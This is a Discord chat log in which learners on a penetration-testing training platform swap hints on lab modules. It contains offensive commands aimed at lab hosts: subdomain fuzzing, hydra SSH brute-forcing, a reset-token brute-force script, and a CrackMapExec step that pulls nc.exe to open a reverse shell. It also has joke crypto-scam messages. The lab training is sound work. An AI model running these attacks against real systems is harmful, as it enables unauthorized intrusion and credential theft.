#modules
@fresh compass i have problema too
ok I'm not the only one ahah, thought I was going crazy! just as I was about to hit 50% in the pentester path lol
darn, I can't even connect to the dashboard now...
same here, I guess someone at HTB tripped on the power cord or something
I think same, where are u at?
yeah I think pods being restarted now
Live Engagement - shells and payloads.
Usually I would tryhard and do it within 2 months.
But I am in uni as well, so it's a bit challenging to manage.
So I'll just take my time.
nice keep grinding, I'm at AD right now, really need to finish the whole course in 60 days, I have like 60% to go.
u2 g
I am working full-time as well, taking care of toddler too lol tough time
if you full time it it's possible, i'm at fuff right now and probably will be done beginning of january
@latent cave me too
Its working now
nice I just want to move to web part, I have some web background I think I can speed up the process
It doesn't connect to the dashboard
well if you have a background you're gonna go faster than me, this is my first foray in the world of IT/computer anything
I am not that experienced either, just did some pentesterlab and portswigger academy before, nothing hands on real projects. good work bud
ah nice, i'm planning on doing portswigger afterwards, how was it?
I think it's great, but you really need to start applying what you learn to real world projects, or do bug bounty, otherwise you will forget everything quickly.
makes sense
I feel HTB CBBH is really good too, I am planning to get an OSCP first, then do the CBBH and jump into bug bounty to practice. dunno how doable is that tho
as long as you keep to it and enjoy it, anything's possible, I learned that from the power rangers, so it has to be true
well it's still not working, I guess that's a sign I should go to bed lol. good luck to you all
@latent cave jajajajaja
My lab spawn but I cannot get a connection
spanish?
me too, only us laugh that way
@elder crow yes! Look up
rough day for the servers
I see, for a moment when I was trying to resolve the domain dns couldn't find the address... I thought there was something with my connection but I see there isn't
yeah not happening atm it seems.
I had the luck for it to spawn like 1.5 hours ago.. but it was all jittery and eventually the connection just tanked
you working on cpts or cbbh
oh no.. I'm just doing modules.. not yet working on any cert
I got that error on my firefox browser at least
Academy its working fine again for me.
Academy is loading for me but boxes arent spawning
Again its not working :/
ah well, portswigger time then
Same here, the targets usually do not spawn at all and when they do I still can't interact with them
yeah, same situation here, boxes aren't spawning F
ahh! a late thank you sm
any help
Hi, I am stuck on Firewall and IDS/IPS Evasion - Medium Lab but am not able to figure out what the answer would be can I DM someone about it ?
Does it work?
The lab seems to work, but I am supposed to enumerate it but am not able to get the information required to answer the question
hi
I am wanting to pass this step but I can't: Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it?
I have tried several options
gobuster vhost --useragent "PENTEST" --wordlist /usr/share/seclists/Discovery/DNS/namelist.txt --url https://inlanefreight.com/
wfuzz -H "Host: FUZZ.inlanefreight.com" --hc 404,403 -H "User-Agent: PENTEST" -c -z file,"/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" https://inlanefreight.com/
@spring trellis thank you. I am with the CBBH, otherwise I would help you. Ask in the cpts section better.
hey in "Locate a configuration file containing an MSSQL connection string." assessment 2 of AD
I can't find any file in any folder of the machines on the network...
am I missing something?
used ||smbmap|| with users: ||BR086|| & ||AB920||,
even tried ||rpcclient|| with ||BR086|| but nothing ...
You can try using ffuf
I'm sure there is something you may have seen, just scroll back the notes or with what you have you need to connect the "dots". Make sure to enumerate the ||SMB|| service and leave no stone unturned
Hello, folks. I was hoping I could please get some help with INTRO TO ASSEMBLY LANGUAGE. I am stuck on Procedures.
Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes)
I have tried an objdump, disas, and breaks. I am not really sure what the question is asking. When I did the break from _start and stepped through everything, I tried every hex there just to try and pass this; no matter what I tried I cannot seem to pass
ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://inlanefreight.com -H "Host: FUZZ.inlanefreight.com"
in did...
that's what driving me crazy ...
Just take a break if needed and get back at it, there is clearly something standing out. One more tip and then I'm done, did you enumerate the user info for ||BR086 ||?
ffuf -w /path/to/vhost/wordlist -u https://target -H "Host: FUZZ" -fs 4242. Should be something like that
in rpcclient u mean?
no, you can get users information directly on the target host. You may want to revisit the net commands in case
splunk not working
Splunk - Discovery & Enumeration
open in nmap scan but cant reach the site
https?
Then if it is still unreachable I don't know
||net ||commands ?
I'm just suggesting you can use whatever command you are comfortable with, there isn't a straight way to accomplish something to reach the end goal. I suggested the net command cause is the one I'm comfortable with and once I have enumerated the user ||BR086|| I have noticed that he could help me getting the config file
Re-enum the shares
-R '||Department Shares||' --dir-only
continue in this way
I did all ||public|| and ||Private||
don't give up, continue to enum
Im currently working on the module "using the metasploit framework". When i try to run eternal romance the target always times out. I am using PWNBOX. Anyone experienced issues too?
Yes, i have issues connecting to the boxes using RDP in the module "Password Attacks". I think there's a generalized problem
oh alright. Thanks.
can I DM ?
Thank you
feeling stupid rn but where tf is the browser application in this vm I rdp to
nvm just used the cli, weird there are no desktop icons for it
can someone help me with dante, i've got good start but would need some nudge?
And if you can't access that, #welcome
Currently doing the Skills Assessment of "Windows Event Logs & Finding Evil". First task, I dont get. I have to detect a hijacking attack, I filtered a little. But when working on that corresponding section, I was able to find the answer because I executed the binary myself and knew what I was searching for. But now I just have a bunch of events. Should I go through them one by one?
I honestly find this whole module very confusing and frustrating. Maybe thats the reason, why I dont get it. Would love a nudge via DM anyway to get any kind of learning effect into this.
EDIT: Managed to get the answer. But just with bruteforcing. I have no clue and no learning effect with this.
Working through the Active Directory module and at certain points it gives you ssh creds to connect to an internal Linux host.
I am having issues where the creds don't seem to work. Has anyone else experienced this?
Requested sever name not found.
why none given example working
It's 'htbdbuser'
ok its time to sleep
if it makes you feel better, theres someone making that exact same mistake on that section daily
its gotta be up there amongst the most common mistakes made in the whole course
I made that mistake... after doing it correctly 
though not the funniest. That would be the rdp not hitting literally any button.
"It was just working... oh"
I am working on password attacks and I have created the mutated list for the zip file. This is where we are. No way I can wait that long lol. I have already waited 2 hours on it.
Attack a different service
Scanning now, instructions on that were not very clear, thanks
Ssh is a slow service, as you can see, always look before you leap
Good advice
This module gives you end goals but doesn't always give you the starting point
For one of them, you need to use a different user to extract the password of the user in the question
Also: save all passwords
This section reuses passwords and lab environments
All linux labs are connected and all Windows labs are connected
In SQL injection module and I can't run mysql. When I try: mysql -u root -p
It says me this: ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/run/mysqld/mysqld.sock' (2)
can someone help?
You need to specify a server
Otherwise it's just trying to do it on your own system
I'm trying this in hackthebox workstation on website
mysql -S $ip
You still need to specify the target
Send a screenshot of your full command
What I said still works out
Without specifying -S it's assuming you're connecting to a localhost server
I'm in thank you. I put mysql --host=... --port=.... -u root -p
and put the password and I'm in now ๐
-S is the shorthand for --host= btw
aha ok, didn't know that
And if it's default port, not necessary to specify
I literally said it a few minutes ago lol
hi y'all I'm looking for someone who's willing to help me with the question 11 from AD assessment II, basically I'd to discuss what I'm doing to see if I'm doing something wrong, anyone?
Guys what is the difference between machines and challenges on HTB?
Isn't it easier just to reply here man? But thanks anyway, I will check instructions,appreciate it
which one is the 11?
Easier for you, but thats not what the channel is for and filling it up with offtopic stuff just ruins the channel for people that are using it for what its meant for
I agree, appreciate it. Thanks for reply @thorn urchin
#1178777939278561481 message any help please
hello guys im stuck on the last question of the DNS section in footprinting module.
i tried to enumerate subdomains to get the FQDN but no host with the IP x.x.x.203 did show up
i also tried to use dnsenum with the subdomains i found but still nothing
any hints will be appreciated
You should be using a fierce wordlists to find the right one
Step 1) dig axfr inlanefreight.htb @ip
Step 2) run dnsenum on those subdomains
thank you very much !!! i found it with that wordlist.
is there a way to make proxychains nmap scans faster.
I've tried specifying retries, rates, parallels, min-hostgroups, and nothing changed -> prolly means its a proxy problem not an nmap one. Sorta at wits end if anyone could give me a direction on this subj or tips
Eh Nmap doesn't play well with proxy
is it nmap or jus scanning in general
Nmap scanning I forget the full reason for it
do u hav an alternative
try with -sT -Pn
ive tried all relevant options alr
but ig im just asking if any1 has the same issue
Fun fact, you haven't tried all the relevant options if you don't have the correct answer
relevant nmap flags*
ligolo my beloved
full normal speed nmap scanning including udp and icmp
proxychains and nmap will always be slow cause youre forced to do a connect scan
There is also a decoy ip option in nmap
Haven't used it myself but read about it
Maybe it can be of use
that option does literally nothing here
i am really trying to filter some packets on wireshark, and i do frame contains "word" but i get 0 results. The "word" is in a specific column, followed by some stuff. It starts with Word, ... .... ... . Why cant i make this work? any idea how to filter the packets about a word inside a column?
Don't know much about it
Just read it somewhere before
the decoy IP option is a legacy feature that hasnt been relevant since the 90s

Im completely serious that isnt hyperbole
What it was for was cause back then scanning wasnt a widespread common thing. So it actually made sense back then to log scan attempts as an early precursor detection for an incoming attack, sometimes even preemptively blocking IPs in the process. Decoy scans were designed to multiply your scan traffic with fake dummies so that it was harder for the net admins to filter out which IP was actually malicious. And if you were auto blocking scan attempts then a decoy scan could make the target DoS themselves by blocking important IPs so it disincentivized auto blocking like that.
These days the entire internet is being scanned 24/7 so it makes zero sense to take such an aggressive stance on simple scans. So the entire point of decoy scanning has ceased to exist. The only reason it remains an option today is because theres not a compelling reason to remove the feature as useless as it is.
<@&861185840277487616>
and what youre asking is not allowed
where can I ask this question
You dont
careful with the language
classic mad buddy come in to troll
ok name 5 books
are u find the answer ?
Hi guys. I'm completely stuck on the last section of the proxy module socks over rdp. When I try to connect to the pivot host I get a message saying either the remote pc is not on, not connected to the network or not enabled. Any advice or hints would be seriously appreciated.
Module: Introduction to Splunk & SPL
I must be doing something wrong as I cannot for the life of me find the answer to the third practical exercise question. Can someone please help me to write the SPL query that will perform the necessary checks?
Makes sense
very interesting, didn't know that, thanks.
Some advantages to being an old hat that first started learning almost two decades ago lmao
Oh nice thats quite a lot
how can i report if someone changed the password in the lab machine?
he changed the password and throw us out
the labs arent shared environments so that didnt happen
unless it wasnt a module lab in which case why are you asking in modules
not in a module.sorry where should i ask?
Nowhere, just reset the lab and move on with life
but asking in modules is the obviously wrong thing. Youre already verified and can see the full server so you should know better
mb
even general chat if you were totally clueless
anyone know if there's a walkthrough for the Windows attacks and Defense module? having difficulty
There's not gonna be a walk-through for any module above tier 0
A walkthrough would be useless. Finishing the module wont help you learn and understand any better.
If you're having difficulty just ask your question here and redact any spoilers by either substituting usernames with [first initial]*
this one : Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
Pth
can I DM?
admin to ms01?
I had a buddy tell me to get good I have to be glued to the computer 24/7 is that true
I use a samsung smart fridge
But when you're tired you're prone to make mistakes
I don't get much time only a few hours a week,
Probably both
Part of learning is confusion
It means you're outside your comfort zone
You are a good motivational speaker
Keep it up buddy
Well if you're doing a learning module on htb academy ask here
Most people will genuinely be helpful, a few will just be Dicks about it
Start with Linux module on academy
It is a great start for someone who is new to linux
Htb academy has a linux Fundamentals module
Install a generic linux distro as your new host. Use it as your daily driver. Whenever you have an issue or need to do something new, google how to till its working.
Easiest way to learn Linux
It's hard to find something in linux that isn't documented, or in some ask forum with your same issue
Most of my fixes I've found on askubuntu
chatgpt for basic commands is also generally okay
I will have to check out, I think it's the basic computer knowledge I lack
Also when googling, if you can, avoid being too specific with the distro, most of the time "how to do x in Linux" will suffice
idk why pth is not working for me with ms01...
even for issues that have nothing to do with Ubuntu lul
the arch wiki too
Like someone the other day mentioned some sort of error that amounted to "you're doing it wrong"
because the arch wiki assumes youre trying to fix some obscure 20 year old system running inside a shoe box off dialup still and will give you the most intricate and hyper specific fixes to solve an issue
Though that was a windows/ldap error
True
Also sometimes the issue is the tool you're using is a new version, and the command no longer works the same
9 out of 10 times an archwiki fix works no matter what your setup is
Getting Started > Pentesting Basics > Public Exploits
I've scanned using nmap, and see a few services running (chargen, ssh, ldp, upnp). My initial thought is to target OpenSSH 8.4p1.
When using searchsploit openssh it comes up with ~ 6 results. (searchsploit openssh 8.4p1 has 0 results.) I then start using Metasploit: search exploit openssh
At this point, it shows one result: unquoted_service_path
Looking at the options for unquoted_service_path, it seems to all be local (i.e. I can't target the remote server). Any thoughts outside of the hint on where I should continue?
the other ports , udp scans
that's probably because the ssh service is not vulnerable, you only need to scan the port given, and maybe take a look with your browser
Nmap is not the way to figure it out
yo stop what youre doing
Youre provided a public IP and port
-_- Thank you three...
absolutely do NOT be full scanning the IP and trying to run random exploits against it!
thats a REAL box
only be testing the provided port
dont accidentally commit a crime while learning lol
I think they've accounted for people scanning the full ip
That's not the point
I would certainly hope so
Im not saying theyd succeed but the severity needs to be understood
that's indeed true
You only test the scope of whats provided or else youre committing crime
It's a good point to be made -- and may even warrant an addition to the lesson
The point is you're given a public ip and port
It's assumed you know the difference between a public and private IP
A reminder never hurts
Also, to clarify, I never ran any random exploits against the server
(Or any, for that matter)
it doesn't matter here since it's a test environment, but in the real world, don't throw anything against targets which you're not cleared to attack
Of course
Is there anyone here able (or rather willing, since I bet most are able) to help me fix my VM. I've been working for 2 days now on a lab and only now realized it was my vm that wasn't working. The pwnbox works but often blanks on me and I have to refresh the page.
I did nothing to the vm that im aware of but I guess I must have changed something in the config files unintentionally
its just a virtual machine. Wipe it and load a new one.
Usually the first thing I do after a new VM install and update is create a new snapshot to act as my 'baseline' and I revert to that if something really breaks
VMs are meant to be semi disposable
always make a golden copy
especially with hacking distros where youre likely to be installing and messing around with bleeding edge unstable software
I suppose, I changed it around a bit for better workflow and have some notes (a while ago when it was still working fine) but I suppose i can do it again
And yea, I always forget to snapshot fresh installs. One day I'll learn. Maybe today is that day
no better incentive than immediately after suffering for not doing it
i lost my vm with like 125 boxes or something and learned to always make snapshots
was able to recover the notes but had to rebuild all the tools 
any important data should be backed up or synced off VM
ya i use obsidian on a different box now for my notes
was still a cherry tree homie then
but in hindsight it helped me learn a lot more making a vm build with more experience understanding what the tools do and stuff
I figured out the exploit for that section. Thank you @thorn urchin , @fathom pendant , @next bronze
I'm more than a little embarrassed for making the mistake I did and wish there was a gentler approach to correction, but lessons learned.
In the "Windows Event Logs & Finding Evil" skills assessment question no3. It asks to determine the process that injected into the process that executed unmanaged PowerShell code. Any hints on that? I revisited all the sections, kinda stuck here! Any help is appreciated
which sysmon id are you initially looking for?'
DETECTING WINDOWS ATTACKS WITH SPLUNK - Detecting Ransomware. I've modified the splunk search for file deletions and the number doesn't seem to be the correct answer. I've tried filtering out some things and tried several different numbers and no go. Is there something I'm missing here? Feel free to DM.
I got my answer, thanks anyways
Figured it out nvm
Hi, how did you do skill assessment question 3, just curious since I went back to it to try and figure out how to give hints
My hint would be to go back to module, see the example log, then try to manufacture something that would catch it.
You have to look for event ID that creates a remote thread (Can't give any spoilers)
Pm?
Sure
AD Enumeration & Attacks - Skills Assessment Part I
I want to find the IP of MS01
Can anyone pass the nslookup command for it, i tried many ways but not working
there are a lot of ways to get/dump dns records, the simplest is just to ping the hostname in a domain joined computer
noobie here that needs some help
"List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file."
I am having trouble with the smbclient command. I cant login with the given credentials (Bob:Welcome1).
I input < $ smbclient -N -L \0.0.0.0 > followed by < $ smbclient -U bob \0.0.0.0\users >
and then used "Welcome1" passkey but it is not going through and throwing an "NS_STATUS_ERROR_CODE" at me...
Anyone else having this issue or find a solution for this?
Fundamental Module "Getting Started" page 7 section "Service Scanning"
either use \\\\ip\\share or //ip/share
smbclient -U bob \\\\IP\\users
gunna try dis
did that, input the given password, and still get NS_STATUS_ERROR
in that case what even is an ns status error?
probably cause the syntax is wrong
ok so how do i go about this then because i am literally following what htb is telling me to do
wait
let me check
Sorry but it's working see
For the password you have to read the section carefully
welcome
Can anyone help me in this..? Please
I've already replied to you earlier
there are a few ways of getting the IP, just recall the basics
hey wsp guys
Found it
some unexpected issues was going on in running the command
At last worked
Hey everyone I've had a weird issue with Elastic Stack from the SIEM module. I pulled up the pwnbox in my browser and it says to access Elastic Stack through "http://[target ip]:5601" . I'm starting to feel stupid cuz it just wouldn't connect. Has anyone had this issue before?
Give it like 5 minutes
dm me if you still have problems
<@&861185840277487616>
I seem to have issues with getting Splunk to work in
Module: Attacking Common Applications
Section: Splunk - Discovery & Enumeration
From what I gathered from the information in the module and later my nmap scan, is that splunk webserver should be accessible on port 8000 of the target machine. When I attempt to I get this:
the protocol is https
are ... ah fook you're right I got so used to it being http I didn't even bother. Thanks.
any time
hello everyone, I'm doing the ffuf Skills Assessment and I'm fuzzing for pages. Is it normal that as soon as I add a subdomain, ffuf gets ridiculously slow? I added them to /etc/hosts...
need help on this
be more accurate
help with what exactly, what have you tried
is not normal
i tried converting the displayed date into epoch time using python datetime
then got md5 hash of it and compared it
import datetime
import hashlib
for offset in range(-100000, 100000):
    total_seconds = round(datetime.datetime.strptime("2023-11-28 12:33:05pm", f"%Y-%m-%d %I:%M:%S%p").timestamp()*1000) + offset
    hash = hashlib.md5(f"htbuser{total_seconds}".encode('utf-8')).hexdigest()
    print(hash)
    if hash == "5b1c00978e854710fb95c5438dcf54ee":
        print(f"Found it!!! {total_seconds}")
        break
i solved it with bruteforce
but i dont remember exactly from the top of my head
can check later
whats wrong with my approach
imma try to use hashcat lol
LOL it worked
wtf the token is not being accepted
what
let me try find my python script
even this is not working :(
im losing patience im just gonna bruteforce the tokens on server now
nvm i just realised i cant
hi im stuck on module Using Crackmapexec skill assessment question 2.
Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt
already got 2 user a* and s* but i don't know what next move.
any hint ?
what ever i do it doesnt work wtf
have u try more than and less than 1 sec
yes everythiing
what i remember i was collect token and hit api in different script
try +-2
sometimes u need refresh page first
it doesnt work in pwnbox either
predictable token more like impossible to predict token
its possible
i tried so many different methods, none of them works
good day friends, i am at Skill Assessment Broken Authentication, i finally got to the ||support ||account but cant find the admin panel, and hint please
how did you do token one pls tell
?
i hate this
let me find it, give me a minute
can someone help me with intro to assembly language : shellcoding tools? I already get the required shellcode, but when I enter the shellcode, it said 'failed to run shellcode'? thx
this can help you : https://forum.hackthebox.com/t/broken-authentication-predictable-reset-token-question-1/268453/3
Hello jydn879, I modify your script and it's work now. Thank you for your code import threading import requests from hashlib import md5 import re import time url = "http://178.128.37.153:30884/question1/" time = int(time.time()) * 1000 start_time = time fail_text = "Wrong token" user = "htbadmin" def check_token(x): token = user + st...
i see no code in thar
can someone DM me and help me with intro to assembly language : shellcoding tools? I really have no idea how to generate the shellcode to cat for flag.txt, thank you
On the "Password Mutations" Section in "Password Attacks" I created a wordlist using
"hashcat --force ./password.list -r ./custom.rule --stdout | sort -u > mut1_password.list"
and used hydra to brute force:
"hydra -l sam -P ./mut1_password.list ssh://10.129.138.117"
However no results. Am i doing sth wrong here ?
Can someone help on AD Enumeration & Attacks - Skills Assessment Part II Q7: Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I am logged in, with xp_cmdshell get a powershell rev. shell, but it seems there is no Desktop folder for the administrator user and could not read the flag. Tried to JuicyPotato, but no luck.
anyone give some advice on the footprinting lab - easy? I am trying to get in via FTP on port ||2121|| using this: ||ftp //ceil:qwer1234@10.129.114.126 2121 or ftp ceil@10.x.x.x 2121|| and all I keep getting when doing it is that fact that it doesn't ask for a password and when I do ls - it says ftp> not connected. Thoughts?
check for a "passive" way to get the files. Wget is mentioned in the section..
@unique palm - i did try this ||wget -r --user=ceil --password=qwer1234 ftp://10.129.234.216 #Download all|| - but I received no results.
try ||wget -m --no-passive ftp://anonymous:anonymous@10.129.14.136|| dont forget to change port
@candid lily could u solve it
@bright quiver worked ?
@unique palm - right now it is sitting here
and I get a bunch of retries:
||-2023-11-28 15:28:52-- (try: 3) http://2121/
Connecting to 2121 (2121)|0.0.8.73|:80... failed: Connection timed out.
Retrying.||
if u want i dm u my solution
yes please
Yo, guys I am at the Live Engagement on shells and payloads.
I have a question:
I used xfreerdp and obtained credentials for Apache Tomcat.
The problem is that the first target only opens up from the 10.129 ( where i used xfreerdp)
My problem is the following: How can I open up the 172.16.1.11:8080 if there's no search engine.
Do I have to use TOR?
Can anyone tell me how to keep my server safe and How do hackers can hack my server so that i can be careful???
anyone have any issues with footprinting easy and grabbing files with wget? I keep getting eh above retry issues and nothing getting downloaded
What was the exact cmd you tried?
try wget //<ip>/<filename>
Without using http/s
open a terminal and type firefox
Where are you at the moment, which section?
@upper ruin right now I am trying this ||wget -m --no-passive ftp://ceil:qwer1234@10.129.234.216||
will try that in a sec, hope it works
Which section is that>
I have my whole footprinting module documented, i can give u guidance.
@upper ruin the easy lab
Ah, one sec.
For some reason nothing seems to be working as usual...I am trying to get in with or retrieve files with port ||2121||
Did you open it up in firefox?
@upper ruin no - didn't try web
You can use gobuster to enumerate the sub/files.
You can maybe use gobuster on the IP with the specific port and get some interesting stuff.
Once you do that you could get to the directory list.
tried that earlier before reverting machine and it didn't grab anything - i can try again, but used basic ftp@victim IP and I got in with ceil/password and can ls -la
Did you try ssh with the credentials?
not sure what changed now, but couldn't do that before
Which ports are open?
||21/2121/22||
Good, which one of these you haven't enumerated fully.
@upper ruin i can see the|| id_rsa|| now - so I should be able to get in ssh after getting it
Maybe you can input the target ip in the search bar and try the usual stuff. index.html/ admin/admin.php
Yup, right path.
@upper ruin thanks for the advice/guidance...mind if I DM you if i get stuck going forward?
Holy sh it WORKED.
Yessir, anytime.
Ah..there's a catch.
@upper ruin thanks a ton
Should I dm it to you now, or later?
Just remember, SSH key may not be restricted to 1 role...maybe a higher privileged role could have the same ssh key.
Ah, nvm that was other box.
You r good.
@upper ruin I think i have to chmod, but let me see what's what...oh that's what you mean lol ok
@upper ruin got in
Nicee.
Remember, you can always use advanced commands. ls -la is much better than just ls
yup - got flag....man that first portion made it longer than needed lol
yessirrr
??
Well, enable the only ports that you need.
Make sure to configure the services accordingly.
If you use ftp for example remove anonymous login.
Apply firewall with rules.
Zero trust ain't a bad idea.
EDR such as aurora won't be a bad start at the os that supports your server.
What else...depends on what you use it for.
and how can people hack into my server?? Will none will be able to hack if i use 2 step vrif??
2 step vrif can be bypassed
But it's hard.
we talk about 2fa, right?
Wanna make sure we don't misunderstand.
any help
But without Logging my actual account How can someone bypass they need to know my number? ... I know not to click on any QR code
I am in the module Password Attacks and attacking SAM. When i try to create a SAM dump it says you need higher privs? Anyone got a hint ?
I am on the Password Attacks Module, section "Remote Password Attacks" any assistance would be greatly appreciated!
where U got stuck?
need a bit help in the last 2 Q of the AD assessment 2
if anyone can help please
Doing kerberos module Unconstrained Delegation part and have this question "Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt"
I've ran rubeus to monitor for tickets, used the spoolsample to get the DC01 tgt, performed a dcsync with user ||brian.willis|| re-issued a ticket using their ntlm hash and then imported but still getting access denied
has anyone done this? Unsure where I am going wrong as methodology seems fine, but clearly making a mistake Edit: solved this, further user enumeration is required to resolve.
i need help with the last portion of getting started module, knowledge check. i am scanning the ip address, enumerating over it, im just stuck on what exploit to use or how to progress to actually gain the foothold
Hi everyone, can anyone help me with the shell and payload module?
I'm stuck in the phpwebshell module, I follow all the steps described by the module, but I can't load the webshell on the site, the steps I take are these
- I download the web shell
- I unzip it and see the 'webshell' file
- now I go to the IP address that htb generated for me
- I enter with my credentials
- go devices->vendor
- I open burpsuite and go to the proxy section
- I open the browser settings and in the proxy section I set 127.0.0.1 with port 8080
- I go to the web and add new
- I enter the credentials and using the browse button I find the .php file
- I save,
This is where the problems begin:
1, the page loads endlessly
2, burpsuite seems to have done its job but the web page never stops loading,
I don't understand what the problem is, can someone tell me where I went wrong and what? can you give me some suggestions?
pls my friend, txt me
can anyone please help me, i am asking for 4 days now, i am at Broken Authentication username injection, tried to add the userid field but didnt work because of the oldpass doesnt match, tried to fuzz it, tried remove it, tried to change to GET method and changing the submit, but no luck so far
please any hint
nobody give a fu.. about us bro
yh
i dont understand
what
i agree with u bro
yh
Y'all need to be patient
till when
till when we die
lol
Someone who's done the module has to drop by to be able to help, people are volunteering their time to help others, you're not entitled to it
I help people when they need it, not when I feel like it.
yh
i can help u if i finished what u want
same
can i dm u
so, you dont have finished that module?
of course feel free
which?
shell e payload
k
can i please dm u?I like to understand where I'm wrong, to arrive at a solution
it's for u
i was talking to @vital zephyr , i had no dm from u
anytime my friend
someone can help?
I tried to connect with ||CME ... -x certutil.exe ... nc.exe 172.16.7.240 4444 || didn't work
I don't know what other way I got to connect to DC01 ...
anyone else got problems with PWNBOX rn? No matter what region i select it says no instances avaible
if you can use crackmap to execute a command, you can use psexec to get a system shell
hey everyone, im having a problem with the hacking wordpress module "directory indexing" section. i get an error in every directory i try to visit
Hello team, anyone knows how do i find the user, ip and pass of the Hackthebox so I can enter via ssh with openvpn and do my exercises?
They have an outage, support told me
what? this doesnt make any sense. just follow the openvpn instructions
Hello i'm trying to hax NASA with html, what is the first step?
@madfOx Im already connect to the openvpn in my terminal, whats next? because yesterday I had a "username" and password to connect via ssh
follow the instructions in the module
@next bronze im doing "Linux Fundamentals" "Working with Files and Directories" and I dont see any instructions...
scroll down and spawn the target
Hi! Im a noob. Just starting with the first module. I cant launch the Pwnbox terminal for the first section. Did I read correctly that the servers are down?
get verified by following the instructions at #welcome , and send a screenshot here
seems like it
Awesome! Thanks!
but the the command wasn't executed, otherwise I should have got a reverse shell
then you don't have admin access
use openvpn from htb
umm Im just starting, not sure where to find that. Any directions would be greatly appreciated.
openvpn is used to connect your own virtual machine, if you're using the in browser pwnbox, that's not applicable to you
well im not sure now but i had similar problem and after i connect to htb vpn works fine,,, didnt use htb some time i had some project outside
so U implying to use section "ACL Abuse Tactics" ...
the server is fine ...
Thanks @next bronze
So, if if I want to verify my account on Discord, Do I have to have a VIP sub? I cant find the Account Identifier in My Settings.
I'm not implying anything, I'm just saying that if you can't execute commands with cme, then you don't have admin access, anyways cme will tell you by showing a P3wned tag before that
no, you just need an account on the main platform
Weird. I cant find the identifier in the settings.
academy is separate from the main platform, you need to create a account here https://app.hackthebox.com/home
Ah. Perfect! Thanks!
at the bottom of the page
why are the characters randomly bolded, am I having a stroke 
its an extension
Bionic reader extension, helps me focus when reading
helps reading, esp for some types of dyslexia or adhd
yup
oh didn't know that, interesting
there's some legit research on that and a special paid app for that lmao
but the extension is unrelated and free
don't reveal your token here
you need a / before the identify command
sorry
it's unique and personal to you alone
but every time I wrote this "/" I get some kind of an error/warning
that's pretty neat
what error?
GOT IT Thanks
nice
yeah ...
that what messing me up
I can't get anything to run on ms01
but there's no local admin user for dc01 ...
Theres no identifier dupe protection so someone can steal your identifier and impersonate your account with an alt which could lead to your htb account getting banned on accident
Do you have a DA user?
what is DA?
Domain Admin
U mean CT*** user?
If thats a user you have access to is a DA then yeah
I was asking you a question, Im not psychic
If you have a DA user you can DCSync to get the DC admin hash. If THAT cant get shell then nothing will.
Getting error no available instances on all pwnbox locations
Any recommendations on the best Linux system to install?
if you're using it for hacking, parrot or kali
services are down for now
Thanks! @next bronze
is there like a server status page to check or is that a non-standard situation?
Gigachad
Hey, guys, has anyone done "Credential hunting in Linux" section of the module "Password attacks" ?
Nope youre the first person to ever attempt it, congratulations!
I got it. Basically I was trying the username Kira (as the hint was saying ---> sudo hydra -l Kira -P mut_Kira_password.list -T64 ssh://10.129.202.64
But instead it should have been "kira"
Maybe the hint should be slightly modified
I mean also, don't attack ssh
Hint gives you a person's name, often in linux environments the username will be lowercase
It's called using your noggin
Yeah but sometimes when you try many things without success, your noggin works less and less
after a break it starts working again
idk sometimes I find a weird sense of inspiration and insight when in the absolute pits of despair
Same here
Pwnbox seems to be back up
By the way, I am doing the penetration tester path and enjoying it so much
It's really well done
could anyone help with footprinting lab -hard?
Be more specific
i found the private key
trying to ssh
asking for password
┌──(root㉿kali)-[~/.ssh]
└─# ssh root@10.129.246.0 -i id_rsa
root@10.129.246.0's password:
Permission denied, please try again.
root@10.129.246.0's password:
what makes you think that key is for the root user
Chmod 600 id_rsa
its not root
Where did you get the ssh key from
root was the last thing i tried
From the mail?
yes
It was
Private key could be used to ssh to root
Are you sure the format of the key is correct? @final mica
I'm like 90% sure the key wasn't for the root user
┌──(root㉿kali)-[~/.ssh]
└─# ls -la
total 20
drwx------ 2 root root 4096 Nov 28 16:26 .
drwx------ 9 root root 4096 Nov 28 16:26 ..
-rw------- 1 root root 3381 Nov 28 16:24 id_rsa
-rw-r--r-- 1 root root 563 Nov 27 16:42 id_rsa.pub
-rw-r--r-- 1 root root 710 Nov 28 16:03 known_hosts
And I'm 100% sure I used it to ssh to root
It's in my notes
mmkay
This is your own ssh folder
Looks weird
And you run as root
Anyways, check if the key format is correct
You don't need the key in your own ssh directory
Just copy the one you get from the mail
ohh
@final mica Once you get the SSH key from the mail, save it as key.txt. Then rename key.txt as mykey.pem. Then chmod 600 mykey.pem
then, ssh -i mykey.pem tom@
okay thank you i will try
i dont understand why this worked... i had the key in id_rsa file and tried to connect the same way
damn, my BTC gone
ty
i got scammed by @jolly cradle
You're welcome
thank you so much
If you send me about 5 SOL I will triple it in the next 15 minutes only.
@next bronze question... How do I connect the ovpn to my VM? I installed Kali on VirtualBox.
Address
This would be right:
If you send me about 5 SOL I will ban you in the next 15 minutes only.
286755fad04869ca523320acce0dc6a4
sudo openvpn <yourVpnFile.ovpn>
The .pem (Privacy Enhanced Mail) format for SSH private keys is often recommended for a few reasons:
Compatibility and Standard Format: The .pem format is widely recognized and compatible with many different types of software and systems. It's a base64-encoded format that includes the key itself along with additional information like the type of key, encryption algorithm used, and sometimes comments. This makes it versatile for various applications, including SSH, SSL/TLS, and other cryptographic needs.
Security: .pem files can store both private and public keys. They are often used for secure transmissions and can be password-protected for additional security. This means that even if someone gains access to your .pem file, they would still need the password to use it.
Ease of Conversion: If you have a key in another format, it's generally straightforward to convert it to .pem format using tools like OpenSSL. This flexibility allows you to use the same key across different systems and applications that may require different formats.
AWS and Other Cloud Services: Many cloud services, like Amazon Web Services (AWS), use the .pem format for SSH keys to access virtual servers (like EC2 instances). If you're working in a cloud environment, using .pem files can make it easier to manage and deploy keys.
